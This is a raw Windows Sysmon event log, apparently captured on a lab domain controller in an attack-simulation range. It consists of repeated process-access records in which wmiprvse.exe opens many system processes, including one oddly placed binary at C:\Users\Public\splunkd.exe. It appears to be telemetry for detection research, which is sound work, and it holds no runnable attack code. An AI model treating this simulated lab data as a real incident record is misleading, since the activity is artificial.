16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 